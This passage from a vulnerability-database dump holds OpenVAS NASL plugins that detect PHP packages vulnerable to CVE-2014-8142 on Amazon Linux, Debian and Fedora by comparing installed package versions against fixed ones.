5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-463.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:30:09", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120450", "title": "Amazon Linux Local Check: alas-2015-464", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-464.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120450\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:39 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-464\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-464.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T16:40:41", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36Two additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-03-19T00:00:00", "published": "2014-12-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703117", "id": "OPENVAS:703117", "title": "Debian Security Advisory DSA 3117-1 (php5 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3117.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 3117-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703117);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_name(\"Debian Security Advisory DSA 3117-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-31 00:00:00 +0100 (Wed, 31 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3117.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36Two additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:19", "bulletinFamily": "scanner", "description": "Check the version of php", "modified": "2017-07-10T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868654", "title": "Fedora Update for php FEDORA-2014-17241", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2014-17241\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868654\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:39:17 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-8142\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2014-17241\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language. PHP attempts to make it\neasy for developers to write dynamically generated web pages. PHP also\noffers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a\ndatabase-enabled webpage with PHP is fairly simple. The most common\nuse of PHP coding is probably as a replacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php)\nwhich adds support for the PHP language to Apache HTTP Server.\n\");\n script_tag(name: \"affected\", value: \"php on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-17241\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147131.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.4~2.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not 